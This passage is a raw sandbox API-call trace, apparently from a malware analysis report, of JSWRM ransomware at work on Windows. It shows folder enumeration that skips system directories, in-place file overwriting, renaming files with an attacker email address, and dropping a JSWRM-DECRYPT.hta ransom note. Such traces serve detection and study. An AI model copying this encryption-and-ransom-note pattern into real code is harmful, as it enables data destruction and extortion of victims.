lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0059.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0059.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0059.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0059.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.696] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0059.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0059.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0059.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0059.700] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.700] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0059.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2413d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0059.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x240fc0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0059.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0059.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0059.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0059.701] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.701] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0059.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0059.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.701] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1043", cAlternateFileName="")) returned 1 [0059.701] lstrcmpiW (lpString1="1043", lpString2=".") returned 1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="..") returned 1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="...") returned 1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="windows") returned -1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="recovery") returned -1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="perflogs") returned -1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="documents and settings") returned -1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="$RECYCLE.BIN") returned 1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="system volume information") returned -1 [0059.701] lstrcmpiW (lpString1="1043", lpString2="msocache") returned -1 [0059.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2265b0 [0059.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.702] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1043\\jswrm-decrypt.hta")) returned 0xffffffff [0059.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2265b0 | out: hHeap=0x1e0000) returned 1 [0059.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0059.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0059.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0059.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.703] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1043\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.704] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.704] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.705] CloseHandle (hObject=0x450) returned 1 [0059.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0059.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0059.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0059.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0059.706] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1043\\jswrm-decrypt.hta")) returned 0x20 [0059.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0059.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.706] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a4069aa, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0059.706] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.706] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a4069aa, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.706] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.706] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.706] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.706] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0059.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0059.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0059.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0059.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.707] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.707] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3546) returned 1 [0059.707] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdd0) returned 0x23dc88 [0059.708] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xdd0, lpOverlapped=0x0) returned 1 [0059.709] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.709] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xdd0, lpOverlapped=0x0) returned 1 [0059.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.709] CloseHandle (hObject=0x3d4) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0059.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0059.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0059.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.710] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0059.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.711] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a3e098b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a3e098b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a4069aa, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0059.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0059.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0059.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.712] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.712] 